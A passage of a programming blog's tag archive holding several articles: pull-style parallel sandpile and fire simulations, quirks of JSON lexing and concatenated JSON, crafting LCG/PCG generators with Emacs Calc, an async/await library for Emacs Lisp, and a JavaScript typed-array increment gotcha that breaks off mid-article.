Articles tagged javascript at null program

When Parallel: Pull, Don't Push

2020-04-30T22:35:51Z

This article was discussed on Hacker News.

I’ve noticed a small pattern across a few of my projects where I had vectorized and parallelized some code. The original algorithm had a “push” approach, the optimized version instead took a “pull” approach. In this article I’ll describe what I mean, though it’s mostly just so I can show off some pretty videos, pictures, and demos.

Sandpiles

A good place to start is the Abelian sandpile model, which, like many before me, completely captured my attention for awhile. It’s a cellular automaton where each cell is a pile of grains of sand — a sandpile. At each step, any sandpile with more than four grains of sand spill one grain into its four 4-connected neighbors, regardless of the number of grains in those neighboring cell. Cells at the edge spill their grains into oblivion, and those grains no longer exist.

With excess sand falling over the edge, the model eventually hits a stable state where all piles have three or fewer grains. However, until it reaches stability, all sorts of interesting patterns ripple though the cellular automaton. In certain cases, the final pattern itself is beautiful and interesting.

Numberphile has a great video describing how to form a group over recurrent configurations (also). In short, for any given grid size, there’s a stable identity configuration that, when “added” to any other element in the group will stabilize back to that element. The identity configuration is a fractal itself, and has been a focus of study on its own.

Computing the identity configuration is really just about running the simulation to completion a couple times from certain starting configurations. Here’s an animation of the process for computing the 64x64 identity configuration:

As a fractal, the larger the grid, the more self-similar patterns there are to observe. There are lots of samples online, and the biggest I could find was this 3000x3000 on Wikimedia Commons. But I wanted to see one that’s even bigger, damnit! So, skipping to the end, I eventually computed this 10000x10000 identity configuration:

This took 10 days to compute using my optimized implementation:

https://github.com/skeeto/scratch/blob/master/animation/sandpiles.c

I picked an algorithm described in a code golf challenge:

f(ones(n)*6 - f(ones(n)*6))

Where f() is the function that runs the simulation to a stable state.

I used OpenMP to parallelize across cores, and SIMD to parallelize within a thread. Each thread operates on 32 sandpiles at a time. To compute the identity sandpile, each sandpile only needs 3 bits of state, so this could potentially be increased to 85 sandpiles at a time on the same hardware. The output format is my old mainstay, Netpbm, including the video output.

Sandpile push and pull

So, what do I mean about pushing and pulling? The naive approach to simulating sandpiles looks like this:

for each i in sandpiles {
    if input[i] < 4 {
        output[i] = input[i]
    } else {
        output[i] = input[i] - 4
        for each j in neighbors {
            output[j] = output[j] + 1
        }
    }
}

As the algorithm examines each cell, it pushes results into neighboring cells. If we’re using concurrency, that means multiple threads of execution may be mutating the same cell, which requires synchronization — locks, atomics, etc. That much synchronization is the death knell of performance. The threads will spend all their time contending for the same resources, even if it’s just false sharing.

The solution is to pull grains from neighbors:

for each i in sandpiles {
    if input[i] < 4 {
        output[i] = input[i]
    } else {
        output[i] = input[i] - 4
    }
    for each j in neighbors {
        if input[j] >= 4 {
            output[i] = output[i] + 1
        }
    }
}

Each thread only modifies one cell — the cell it’s in charge of updating — so no synchronization is necessary. It’s shader-friendly and should sound familiar if you’ve seen my WebGL implementation of Conway’s Game of Life. It’s essentially the same algorithm. If you chase down the various Abelian sandpile references online, you’ll eventually come across a 2017 paper by Cameron Fish about running sandpile simulations on GPUs. He cites my WebGL Game of Life article, bringing everything full circle. We had spoken by email at the time, and he shared his interactive simulation with me.

Vectorizing this algorithm is straightforward: Load multiple piles at once, one per SIMD channel, and use masks to implement the branches. In my code I’ve also unrolled the loop. To avoid bounds checking in the SIMD code, I pad the state data structure with zeros so that the edge cells have static neighbors and are no longer special.

WebGL Fire

Back in the old days, one of the cool graphics tricks was fire animations. It was so easy to implement on limited hardware. In fact, the most obvious way to compute it was directly in the framebuffer, such as in the VGA buffer, with no outside state.

There’s a heat source at the bottom of the screen, and the algorithm runs from bottom up, propagating that heat upwards randomly. Here’s the algorithm using traditional screen coordinates (top-left corner origin):

func rand(min, max) // random integer in [min, max]

for each x, y from bottom {
    buf[y-1][x+rand(-1, 1)] = buf[y][x] - rand(0, 1)
}

As a push algorithm it works fine with a single-thread, but it doesn’t translate well to modern video hardware. So convert it to a pull algorithm!

for each x, y {
    sx = x + rand(-1, 1)
    sy = y + rand(1, 2)
    output[y][x] = input[sy][sx] - rand(0, 1)
}

Cells pull the fire upward from the bottom. Though this time there’s a catch: This algorithm will have subtly different results.

In the original, there’s a single state buffer and so a flame could propagate upwards multiple times in a single pass. I’ve compensated here by allowing a flames to propagate further at once.
In the original, a flame only propagates to one other cell. In this version, two cells might pull from the same flame, cloning it.

In the end it’s hard to tell the difference, so this works out.

source code and instructions

There’s still potentially contention in that rand() function, but this can be resolved with a hash function that takes x and y as inputs.

Unintuitive JSON Parsing

2019-12-28T17:23:09Z

This article was discussed on Hacker News and on reddit.

Despite the goal of JSON being a subset of JavaScript — which it failed to achieve (update: this was fixed) — parsing JSON is quite unlike parsing a programming language. For invalid inputs, the specific cause of error is often counter-intuitive. Normally this doesn’t matter, but I recently ran into a case where it does.

Consider this invalid input to a JSON parser:

[01]

To a human this might be interpreted as an array containing a number. Either the leading zero is ignored, or it indicates octal, as it does in many languages, including JavaScript. In either case the number in the array would be 1.

However, JSON does not support leading zeros, neither ignoring them nor supporting octal notation. Here’s the railroad diagram for numbers from the JSON specficaiton:

Or in regular expression form:

-?(0|[1-9][0-9]*)(\.[0-9]+)?([eE][+-]?[0-9]+)?

If a token starts with 0 then it can only be followed by ., e, or E. It cannot be followed by a digit. So, the natural human response to mentally parsing [01] is: This input is invalid because it contains a number with a leading zero, and leading zeros are not accepted. But this is not actually why parsing fails!

A simple model for the parser is as consuming tokens from a lexer. The lexer’s job is to read individual code points (characters) from the input and group them into tokens. The possible tokens are string, number, left brace, right brace, left bracket, right bracket, comma, true, false, and null. The lexer skips over insignificant whitespace, and it doesn’t care about structure, like matching braces and brackets. That’s the parser’s job.

In some instances the lexer can fail to parse a token. For example, if while looking for a new token the lexer reads the character %, then the input must be invalid. No token starts with this character. So in some cases invalid input will be detected by the lexer.

The parser consumes tokens from the lexer and, using some state, ensures the sequence of tokens is valid. For example, arrays must be a well formed sequence of left bracket, value, comma, value, comma, etc., right bracket. One way to reject input with trailing garbage, is for the lexer to also produce an EOF (end of file/input) token when there are no more tokens, and the parser could specifically check for that token before accepting the input as valid.

Getting back to the input [01], a JSON parser receives a left bracket token, then updates its bookkeeping to track that it’s parsing an array. When looking for the next token, the lexer sees the character 0 followed by 1. According to the railroad diagram, this is a number token (starts with 0), but 1 cannot be part of this token, so it produces a number token with the contents “0”. Everything is still fine.

Next the lexer sees 1 followed by ]. Since ] cannot be part of a number, it produces another number token with the contents “1”. The parser receives this token but, since it’s parsing an array, it expects either a comma token or a right bracket. Since this is neither, the parser fails with an error about an unexpected number. The parser will not complain about leading zeros because JSON has no concept of leading zeros. Human intuition is right, but for the wrong reasons.

Try this for yourself in your favorite JSON parser. Or even just pop up the JavaScript console in your browser and try it out:

JSON.parse('[01]');

Firefox reports:

SyntaxError: JSON.parse: expected ‘,’ or ‘]’ after array element

Chromium reports:

SyntaxError: Unexpected number in JSON

Edge reports (note it says “number” not “digit”):

Error: Invalid number at position:3

In all cases the parsers accepted a zero as the first array element, then rejected the input after the second number token for being a bad sequence of tokens. In other words, this is a parser error rather than a lexer error, as a human might intuit.

My JSON parser comes with a testing tool that shows the token stream up until the parser rejects the input, useful for understanding these situations:

$ echo '[01]' | tests/stream
struct expect seq[] = {
    {JSON_ARRAY},
    {JSON_NUMBER, "0"},
    {JSON_ERROR},
};

There’s an argument to be made here that perhaps the human readable error message should mention leading zeros, since that’s likely the cause of the invalid input. That is, a human probably thought JSON allowed leading zeros, and so the clearer message would tell the human that JSON does not allow leading zeros. This is the “more art than science” part of parsing.

It’s the same story with this invalid input:

[truefalse]

From this input, the lexer unambiguously produces left bracket, true, false, right bracket. It’s still up to the parser to reject this input. The only reason we never see truefalse in valid JSON is that the overall structure never allows these tokens to be adjacent, not because they’d be ambiguous. Programming languages have identifiers, and in a programming language this would parse as the identifier truefalse rather than true followed by false. From this point of view, JSON seems quite strange.

Just as before, Firefox reports:

SyntaxError: JSON.parse: expected ‘,’ or ‘]’ after array element

Chromium reports the same error as it does for [true false]:

SyntaxError: Unexpected token f in JSON

Edge’s message is probably a minor bug in their JSON parser:

Error: Expected ‘]’ at position:10

Position 10 is the last character in false. The lexer consumed false from the input, produced a “false” token, then the parser rejected the input. When it reported the error, it chose the end of the invalid token as the error position rather than the start, despite the fact that the only two valid tokens (comma, right bracket) are both a single character. It should also say “Expected ‘]’ or ‘,’” (as Firefox does) rather than just “]”.

Concatenated JSON

That’s all pretty academic. Except for producing nice error messages, nobody really cares so much why the input was rejected. The mismatch between intuition and reality isn’t important.

However, it does come up with concatenated JSON. Some parsers, including mine, will optionally consume multiple JSON values, one after another, from the same input. Here’s an example from one of my favorite command line tools, jq:

echo '{"x":0,"y":1}{"x":2,"y":3}{"x":4,"y":5}' | jq '.x + .y'
1
5
9

The input contains three unambiguously-concatenated JSON objects, so the parser produces three distinct objects. Now consider this input, this time outside of the context of an array:

Is this invalid, one number, or two numbers? According to the lexer and parser model described above, this is valid and unambiguously two concatenated numbers. Here’s what my parser says:

$ echo '01' | tests/stream
struct expect seq[] = {
    {JSON_NUMBER, "0"},
    {JSON_DONE},
    {JSON_NUMBER, "1"},
    {JSON_DONE},
    {JSON_ERROR},
};

Note: The JSON_DONE “token” indicates acceptance, and the JSON_ERROR token is an EOF indicator, not a hard error. Since jq allows leading zeros in its JSON input, it’s ambiguous and parses this as the number 1, so asking its opinion on this input isn’t so interesting. I surveyed some other JSON parsers that accept concatenated JSON:

Jackson: Reject as leading zero.
Noggit: Reject as leading zero.
yajl: Accept as two numbers.

For my parser it’s the same story for truefalse:

echo 'truefalse' | tests/stream
struct expect seq[] = {
    {JSON_TRUE, "true"},
    {JSON_DONE},
    {JSON_FALSE, "false"},
    {JSON_DONE},
    {JSON_ERROR},
};

Neither rejecting nor accepting this input is wrong, per se. Concatenated JSON is outside of the scope of JSON itself, and concatenating arbitrary JSON objects without a whitespace delimiter can lead to weird and ill-formed input. This is all a great argument in favor or Newline Delimited JSON, and its two simple rules:

Line separator is '\n'
Each line is a valid JSON value

This solves the concatenation issue, and, even more, it works well with parsers not supporting concatenation: Split the input on newlines and pass each line to your JSON parser.

On-the-fly Linear Congruential Generator Using Emacs Calc

2019-11-19T01:17:50Z

I regularly make throwaway “projects” and do a surprising amount of programming in /tmp. For Emacs Lisp, the equivalent is the *scratch* buffer. These are places where I can make a mess, and the mess usually gets cleaned up before it becomes a problem. A lot of my established projects (ex.) start out in volatile storage and only graduate to more permanent storage once the concept has proven itself.

Throughout my whole career, this sort of throwaway experimentation has been an important part of my personal growth, and I try to encourage it in others. Even if the idea I’m trying doesn’t pan out, I usually learn something new, and occasionally it translates into an article here.

I also enjoy small programming challenges. One of the most abused tools in my mental toolbox is the Monte Carlo method, and I readily apply it to solve toy problems. Even beyond this, random number generators are frequently a useful tool (1, 2), so I find myself reaching for one all the time.

Nearly every programming language comes with a pseudo-random number generation function or library. Unfortunately the language’s standard PRNG is usually a poor choice (C, C++, C#, Go). It’s probably mediocre quality, slower than it needs to be (also), lacks reliable semantics or behavior between implementations, or is missing some other property I want. So I’ve long been a fan of BYOPRNG: Bring Your Own Pseudo-random Number Generator. Just embed a generator with the desired properties directly into the program. The best non-cryptographic PRNGs today are tiny and exceptionally friendly to embedding. Though, depending on what you’re doing, you might need to be creative about seeding.

Crafting a PRNG

On occasion I don’t have an established, embeddable PRNG in reach, and I have yet to commit xoshiro256** to memory. Or maybe I want to use a totally unique PRNG for a particular project. In these cases I make one up. With just a bit of know-how it’s not too difficult.

Probably the easiest decent PRNG to code from scratch is the venerable Linear Congruential Generator (LCG). It’s a simple recurrence relation:

x[1] = (x[0] * A + C) % M

That’s trivial to remember once you know the details. You only need to choose appropriate values for A, C, and M. Done correctly, it will be a full-period generator — a generator that visits a permutation of each of the numbers between 0 and M - 1. The seed — the value of x[0] — is chooses a starting position in this (looping) permutation.

M has a natural, obvious choice: a power of two matching the range of operands, such as 2^32 or 2^64. With this the modulo operation is free as a natural side effect of the computer architecture.

Choosing C also isn’t difficult. It must be co-prime with M, and since M is a power of two, any odd number is valid. Even 1. In theory choosing a small value like 1 is faster since the compiler won’t need to embed a large integer in the code, but this difference doesn’t show up in any micro-benchmarks I tried. If you want a cool, unique generator, then choose a large random integer. More on that below.

The tricky value is A, and getting it right is the linchpin of the whole LCG. It must be coprime with M (i.e. not even), and, for a full-period generator, A-1 must be divisible by four. For better results, A-1 should not be divisible by 8. A good choice is a prime number that satisfies these properties.

If your operands are 64-bit integers, or larger, how are you going to generate a prime number?

Primes from Emacs Calc

Emacs Calc can solve this problem. I’ve noted before how featureful it is. It has arbitrary precision, random number generation, and primality testing. It’s everything we need to choose A. (In fact, this is nearly identical to the process I used to implement RSA.) For this example I’m going to generate a 64-bit LCG for the C programming language, but it’s easy to use whatever width you like and mostly whatever language you like. If you wanted a minimal standard 128-bit LCG, this will still work.

Start by opening up Calc with M-x calc, then:

Push 2 on the stack
Push 64 on the stack
Press ^, computing 2^64 and pushing it on the stack
Press k r to generate a random number in this range
Press d r 16 to switch to hexadecimal display
Press k n to find the next prime following the random value
Repeat step 6 until you get a number that ends with 5 or D
Press k p a few times to avoid false positives.

What’s left on the stack is your A! If you want a random value for C, you can follow a similar process. Heck, make it prime, too!

The reason for using hexadecimal (step 5) and looking for 5 or D (step 7) is that such numbers satisfy both of the important properties for A-1.

Calc doesn’t try to factor your random integer. Instead it uses the Miller–Rabin primality test, a probabilistic test that, itself, requires random numbers. It has false positives but no false negatives. The false positives can be mitigated by repeating the test multiple times, hence step 8.

Trying this all out right now, I got this implementation (in C):

uint64_t lcg1(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    return s;
}

However, we can still do a little better. Outputting the entire state doesn’t have great results, so instead it’s better to create a truncated LCG and only return some portion of the most significant bits.

uint32_t lcg2(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    return s >> 32;
}

This won’t quite pass BigCrush in 64-bit form, but the results are pretty reasonable for most purposes.

But we can still do better without needing to remember much more than this.

Appending permutation

A Permuted Congruential Generator (PCG) is really just a truncated LCG with a permutation applied to its output. Like LCGs themselves, there are arbitrarily many variations. The “official” implementation has a data-dependent shift, for which I can never remember the details. Fortunately a couple of simple, easy to remember transformations is sufficient. Basically anything I used while prospecting for hash functions. I love xorshifts, so lets add one of those:

uint32_t pcg1(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    uint32_t r = s >> 32;
    r ^= r >> 16;
    return r;
}

This is a big improvement, but it still fails one BigCrush test. As they say, when xorshift isn’t enough, use xorshift-multiply! Below I generated a 32-bit prime for the multiply, but any odd integer is a valid permutation.

uint32_t pcg2(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    uint32_t r = s >> 32;
    r ^= r >> 16;
    r *= UINT32_C(0x60857ba9);
    return r;
}

This passes BigCrush, and I can reliably build a new one entirely from scratch using Calc any time I need it.

Bonus: Adapting to other languages

Sometimes it’s not so straightforward to adapt this technique to other languages. For example, JavaScript has limited support for 32-bit integer operations (enough for a poor 32-bit LCG) and no 64-bit integer operations. Though BigInt is now a thing, and should make a great 96- or 128-bit LCG easy to build.

function lcg(seed) {
    let s = BigInt(seed);
    return function() {
        s *= 0xef725caa331524261b9646cdn;
        s += 0x213734f2c0c27c292d814385n;
        s &= 0xffffffffffffffffffffffffn;
        return Number(s >> 64n);
    }
}

Java doesn’t have unsigned integers, so how could you build the above PCG in Java? Easy! First, remember is that Java has two’s complement semantics, including wrap around, and that two’s complement doesn’t care about unsigned or signed for multiplication (or addition, or subtraction). The result is identical. Second, the oft-forgotten >>> operator does an unsigned right shift. With these two tips:

long s = 0;

int pcg2() {
    s = s*0x7c3c3267d015ceb5L + 0x24bd2d95276253a9L;
    int r = (int)(s >>> 32);
    r ^= r >>> 16;
    r *= 0x60857ba9;
    return r;
}

So, in addition to the Calc step list above, you may need to know some of the finer details of your target language.

An Async / Await Library for Emacs Lisp

2019-03-10T20:57:03Z

As part of building my Python proficiency, I’ve learned how to use asyncio. This new language feature first appeared in Python 3.5 (PEP 492, September 2015). JavaScript grew a nearly identical feature in ES2017 (June 2017). An async function can pause to await on an asynchronously computed result, much like a generator pausing when it yields a value.

In fact, both Python and JavaScript async functions are essentially just fancy generator functions with some specialized syntax and semantics. That is, they’re stackless coroutines. Both languages already had generators, so their generator-like async functions are a natural extension that — unlike stackful coroutines — do not require significant, new runtime plumbing.

Emacs officially got generators in 25.1 (September 2016), though, unlike Python and JavaScript, it didn’t require any additional support from the compiler or runtime. It’s implemented entirely using Lisp macros. In other words, it’s just another library, not a core language feature. In theory, the generator library could be easily backported to the first Emacs release to properly support lexical closures, Emacs 24.1 (June 2012).

For the same reason, stackless async/await coroutines can also be implemented as a library. So that’s what I did, letting Emacs’ generator library do most of the heavy lifting. The package is called aio:

https://github.com/skeeto/emacs-aio

It’s modeled more closely on JavaScript’s async functions than Python’s asyncio, with the core representation being promises rather than a coroutine objects. I just have an easier time reasoning about promises than coroutines.

I’m definitely not the first person to realize this was possible, and was beaten to the punch by two years. Wanting to avoid fragmentation, I set aside all formality in my first iteration on the idea, not even bothering with namespacing my identifiers. It was to be only an educational exercise. However, I got quite attached to my little toy. Once I got my head wrapped around the problem, everything just sort of clicked into place so nicely.

In this article I will show step-by-step one way to build async/await on top of generators, laying out one concept at a time and then building upon each. But first, some examples to illustrate the desired final result.

aio example

Ignoring all its problems for a moment, suppose you want to use url-retrieve to fetch some content from a URL and return it. To keep this simple, I’m going to omit error handling. Also assume that lexical-binding is t for all examples. Besides, lexical scope required by the generator library, and therefore also required by aio.

The most naive approach is to fetch the content synchronously:

(defun fetch-fortune-1 (url)
  (let ((buffer (url-retrieve-synchronously url)))
    (with-current-buffer buffer
      (prog1 (buffer-string)
        (kill-buffer)))))

The result is returned directly, and errors are communicated by an error signal (e.g. Emacs’ version of exceptions). This is convenient, but the function will block the main thread, locking up Emacs until the result has arrived. This is obviously very undesirable, so, in practice, everyone nearly always uses the asynchronous version:

(defun fetch-fortune-2 (url callback)
  (url-retrieve url (lambda (_status)
                      (funcall callback (buffer-string)))))

The main thread no longer blocks, but it’s a whole lot less convenient. The result isn’t returned to the caller, and instead the caller supplies a callback function. The result, whether success or failure, will be delivered via callback, so the caller must split itself into two pieces: the part before the callback and the callback itself. Errors cannot be delivered using a error signal because of the inverted flow control.

The situation gets worse if, say, you need to fetch results from two different URLs. You either fetch results one at a time (inefficient), or you manage two different callbacks that could be invoked in any order, and therefore have to coordinate.

Wouldn’t it be nice for the function to work like the first example, but be asynchronous like the second example? Enter async/await:

(aio-defun fetch-fortune-3 (url)
  (let ((buffer (aio-await (aio-url-retrieve url))))
    (with-current-buffer buffer
      (prog1 (buffer-string)
        (kill-buffer)))))

A function defined with aio-defun is just like defun except that it can use aio-await to pause and wait on any other function defined with aio-defun — or, more specifically, any function that returns a promise. Borrowing Python parlance: Returning a promise makes a function awaitable. If there’s an error, it’s delivered as a error signal from aio-url-retrieve, just like the first example. When called, this function returns immediately with a promise object that represents a future result. The caller might look like this:

(defcustom fortune-url ...)

(aio-defun display-fortune ()
  (interactive)
  (message "%s" (aio-await (fetch-fortune-3 fortune-url))))

How wonderfully clean that looks! And, yes, it even works with interactive like that. I can M-x display-fortune and a fortune is printed in the minibuffer as soon as the result arrives from the server. In the meantime Emacs doesn’t block and I can continue my work.

You can’t do anything you couldn’t already do before. It’s just a nicer way to organize the same callbacks: implicit rather than explicit.

Promises, simplified

The core object at play is the promise. Promises are already a rather simple concept, but aio promises have been distilled to their essence, as they’re only needed for this singular purpose. More on this later.

As I said, a promise represents a future result. In practical terms, a promise is just an object to which one can subscribe with a callback. When the result is ready, the callbacks are invoked. Another way to put it is that promises reify the concept of callbacks. A callback is no longer just the idea of extra argument on a function. It’s a first-class thing that itself can be passed around as a value.

Promises have two slots: the final promise result and a list of subscribers. A nil result means the result hasn’t been computed yet. It’s so simple I’m not even bothering with cl-struct.

(defun aio-promise ()
  "Create a new promise object."
  (record 'aio-promise nil ()))

(defsubst aio-promise-p (object)
  (and (eq 'aio-promise (type-of object))
       (= 3 (length object))))

(defsubst aio-result (promise)
  (aref promise 1))

To subscribe to a promise, use aio-listen:

(defun aio-listen (promise callback)
  (let ((result (aio-result promise)))
    (if result
        (run-at-time 0 nil callback result)
      (push callback (aref promise 2)))))

If the result isn’t ready yet, add the callback to the list of subscribers. If the result is ready call the callback in the next event loop turn using run-at-time. This is important because it keeps all the asynchronous components isolated from one another. They won’t see each others’ frames on the call stack, nor frames from aio. This is so important that the Promises/A+ specification is explicit about it.

The other half of the equation is resolving a promise, which is done with aio-resolve. Unlike other promises, aio promises don’t care whether the promise is being fulfilled (success) or rejected (error). Instead a promise is resolved using a value function — or, usually, a value closure. Subscribers receive this value function and extract the value by invoking it with no arguments.

Why? This lets the promise’s resolver decide the semantics of the result. Instead of returning a value, this function can instead signal an error, propagating an error signal that terminated an async function. Because of this, the promise doesn’t need to know how it’s being resolved.

When a promise is resolved, subscribers are each scheduled in their own event loop turns in the same order that they subscribed. If a promise has already been resolved, nothing happens. (Thought: Perhaps this should be an error in order to catch API misuse?)

(defun aio-resolve (promise value-function)
  (unless (aio-result promise)
    (let ((callbacks (nreverse (aref promise 2))))
      (setf (aref promise 1) value-function
            (aref promise 2) ())
      (dolist (callback callbacks)
        (run-at-time 0 nil callback value-function)))))

If you’re not an async function, you might subscribe to a promise like so:

(aio-listen promise (lambda (v)
                      (message "%s" (funcall v))))

The simplest example of a non-async function that creates and delivers on a promise is a “sleep” function:

(defun aio-sleep (seconds &optional result)
  (let ((promise (aio-promise))
        (value-function (lambda () result)))
    (prog1 promise
      (run-at-time seconds nil
                   #'aio-resolve promise value-function))))

Similarly, here’s a “timeout” promise that delivers a special timeout error signal at a given time in the future.

(defun aio-timeout (seconds)
  (let ((promise (aio-promise))
        (value-function (lambda () (signal 'aio-timeout nil))))
    (prog1 promise
      (run-at-time seconds nil
                   #'aio-resolve promise value-function))))

That’s all there is to promises.

Evaluate in the context of a promise

Before we get into pausing functions, lets deal with the slightly simpler matter of delivering their return values using a promise. What we need is a way to evaluate a “body” and capture its result in a promise. If the body exits due to a signal, we want to capture that as well.

Here’s a macro that does just this:

(defmacro aio-with-promise (promise &rest body)
  `(aio-resolve ,promise
                (condition-case error
                    (let ((result (progn ,@body)))
                      (lambda () result))
                  (error (lambda ()
                           (signal (car error) ; rethrow
                                   (cdr error)))))))

The body result is captured in a closure and delivered to the promise. If there’s an error signal, it’s “rethrown” into subscribers by the promise’s value function.

This is where Emacs Lisp has a serious weak spot. There’s not really a concept of rethrowing a signal. Unlike a language with explicit exception objects that can capture a snapshot of the backtrace, the original backtrace is completely lost where the signal is caught. There’s no way to “reattach” it to the signal when it’s rethrown. This is unfortunate because it would greatly help debugging if you got to see the full backtrace on the other side of the promise.

Async functions

So we have promises and we want to pause a function on a promise. Generators have iter-yield for pausing an iterator’s execution. To tackle this problem:

Yield the promise to pause the iterator.
Subscribe a callback on the promise that continues the generator (iter-next) with the promise’s result as the yield result.

All the hard work is done in either side of the yield, so aio-await is just a simple wrapper around iter-yield:

(defmacro aio-await (expr)
  `(funcall (iter-yield ,expr)))

Remember, that funcall is here to extract the promise value from the value function. If it signals an error, this propagates directly into the iterator just as if it had been a direct call — minus an accurate backtrace.

So aio-lambda / aio-defun needs to wrap the body in a generator (iter-lamba), invoke it to produce a generator, then drive the generator using callbacks. Here’s a simplified, unhygienic definition of aio-lambda:

(defmacro aio-lambda (arglist &rest body)
  `(lambda (&rest args)
     (let ((promise (aio-promise))
           (iter (apply (iter-lambda ,arglist
                          (aio-with-promise promise
                            ,@body))
                        args)))
       (prog1 promise
         (aio--step iter promise nil)))))

The body is evaluated inside aio-with-promise with the result delivered to the promise returned directly by the async function.

Before returning, the iterator is handed to aio--step, which drives the iterator forward until it delivers its first promise. When the iterator yields a promise, aio--step attaches a callback back to itself on the promise as described above. Immediately driving the iterator up to the first yielded promise “primes” it, which is important for getting the ball rolling on any asynchronous operations.

If the iterator ever yields something other than a promise, it’s delivered right back into the iterator.

(defun aio--step (iter promise yield-result)
  (condition-case _
      (cl-loop for result = (iter-next iter yield-result)
               then (iter-next iter (lambda () result))
               until (aio-promise-p result)
               finally (aio-listen result
                                   (lambda (value)
                                     (aio--step iter promise value))))
    (iter-end-of-sequence)))

When the iterator is done, nothing more needs to happen since the iterator resolves its own return value promise.

The definition of aio-defun just uses aio-lambda with defalias. There’s nothing to it.

That’s everything you need! Everything else in the package is merely useful, awaitable functions like aio-sleep and aio-timeout.

Composing promises

Unfortunately url-retrieve doesn’t support timeouts. We can work around this by composing two promises: a url-retrieve promise and aio-timeout promise. First define a promise-returning function, aio-select that takes a list of promises and returns (as another promise) the first promise to resolve:

(defun aio-select (promises)
  (let ((result (aio-promise)))
    (prog1 result
      (dolist (promise promises)
        (aio-listen promise (lambda (_)
                              (aio-resolve
                               result
                               (lambda () promise))))))))

We give aio-select both our url-retrieve and timeout promises, and it tells us which resolved first:

(aio-defun fetch-fortune-4 (url timeout)
  (let* ((promises (list (aio-url-retrieve url)
                         (aio-timeout timeout)))
         (fastest (aio-await (aio-select promises)))
         (buffer (aio-await fastest)))
    (with-current-buffer buffer
      (prog1 (buffer-string)
        (kill-buffer)))))

Cool! Note: This will not actually cancel the URL request, just move the async function forward earlier and prevent it from getting the result.

Threads

Despite aio being entirely about managing concurrent, asynchronous operations, it has nothing at all to do with threads — as in Emacs 26’s support for kernel threads. All async functions and promise callbacks are expected to run only on the main thread. That’s not to say an async function can’t await on a result from another thread. It just must be done very carefully.

Processes

The package also includes two functions for realizing promises on processes, whether they be subprocesses or network sockets.

aio-process-filter
aio-process-sentinel

For example, this function loops over each chunk of output (typically 4kB) from the process, as delivered to a filter function:

(aio-defun process-chunks (process)
  (cl-loop for chunk = (aio-await (aio-process-filter process))
           while chunk
           do (... process chunk ...)))

Exercise for the reader: Write an awaitable function that returns a line at at time rather than a chunk at a time. You can build it on top of aio-process-filter.

I considered wrapping functions like start-process so that their aio versions would return a promise representing some kind of result from the process. However there are so many different ways to create and configure processes that I would have ended up duplicating all the process functions. Focusing on the filter and sentinel, and letting the caller create and configure the process is much cleaner.

Unfortunately Emacs has no asynchronous API for writing output to a process. Both process-send-string and process-send-region will block if the pipe or socket is full. There is no callback, so you cannot await on writing output. Maybe there’s a way to do it with a dedicated thread?

Another issue is that the process-send-* functions are preemptible, made necessary because they block. The aio-process-* functions leave a gap (i.e. between filter awaits) where no filter or sentinel function is attached. It’s a consequence of promises being single-fire. The gap is harmless so long as the async function doesn’t await something else or get preempted. This needs some more thought.

Update: These process functions no longer exist and have been replaced by a small framework for building chains of promises. See aio-make-callback.

Testing aio

The test suite for aio is a bit unusual. Emacs’ built-in test suite, ERT, doesn’t support asynchronous tests. Furthermore, tests are generally run in batch mode, where Emacs invokes a single function and then exits rather than pump an event loop. Batch mode can only handle asynchronous process I/O, not the async functions of aio. So it’s not possible to run the tests in batch mode.

Instead I hacked together a really crude callback-based test suite. It runs in non-batch mode and writes the test results into a buffer (run with make check). Not ideal, but it works.

One of the tests is a sleep sort (with reasonable tolerances). It’s a pretty neat demonstration of what you can do with aio:

(aio-defun sleep-sort (values)
  (let ((promises (mapcar (lambda (v) (aio-sleep v v)) values)))
    (cl-loop while promises
             for next = (aio-await (aio-select promises))
             do (setf promises (delq next promises))
             collect (aio-await next))))

To see it in action (M-x sleep-sort-demo):

(aio-defun sleep-sort-demo ()
  (interactive)
  (let ((values '(0.1 0.4 1.1 0.2 0.8 0.6)))
    (message "%S" (aio-await (sleep-sort values)))))

Async/await is pretty awesome

I’m quite happy with how this all came together. Once I had the concepts straight — particularly resolving to value functions — everything made sense and all the parts fit together well, and mostly by accident. That feels good.

A JavaScript Typed Array Gotcha

2019-01-23T02:50:30Z

JavaScript’s prefix increment and decrement operators can be surprising when applied to typed arrays. It caught be by surprise when I was porting some C code over to JavaScript Just using your brain to execute this code, what do you believe is the value of r?

let array = new Uint8Array([255]);
let r = ++array[0];

The increment and decrement operators originated in the B programming language. Its closest living relative today is C, and, as far as these operators are concered, C can be considered an ancestor of JavaScript. So what is the value of r in this similar C code?

uint8_t array[] = {255};
int r = ++array[0];

Of course, if they were the same then there would be nothing to write about, so that should make it easier to guess if you aren’t sure. The answer: In JavaScript, r is 256. In C, r is 0.

What happened to me was that I wrote an 80-bit integer increment routine in C like this:

uint8_t array[10];
/* ... */
for (int i = 9; i >= 0; i--)
    if (++array[i])
        break;

But I was getting the wrong result over in JavaScript from essentially the same code:

let array = new Uint8Array(10);
/* ... */
for (let i = 9; i >= 0; i--)
    if (++array[i])
        break;

So what’s going on here?

JavaScript specification

The ES5 specification says this about the prefix increment operator:

Let expr be the result of evaluating UnaryExpression.

Throw a SyntaxError exception if the following conditions are all true: [omitted]

Let oldValue be ToNumber(GetValue(expr)).

Let newValue be the result of adding the value 1 to oldValue, using the same rules as for the + operator (see 11.6.3).

Call PutValue(expr, newValue).

Return newValue.

So, oldValue is 255. This is a double precision float because all numbers in JavaScript (outside of the bitwise operations) are double precision floating point. Add 1 to this value to get 256, which is newValue. When newValue is stored in the array via PutValue(), it’s converted to an unsigned 8-bit integer, which truncates it to 0.

However, newValue is returned, not the value that was actually stored in the array!

Since JavaScript is dynamically typed, this difference did not actually matter until typed arrays are involved. I suspect if typed arrays were in JavaScript from the beginning, the specified behavior would be more in line with C.

This behavior isn’t limited to the prefix operators. Consider assignment:

let array = new Uint8Array([255]);
let r = (array[0] = array[0] + 1);
let s = (array[0] += 1);

Both r and s will still be 256. The result of the assignment operators is a similar story:

LeftHandSideExpression = AssignmentExpression is evaluated as follows:

Let lref be the result of evaluating LeftHandSideExpression.

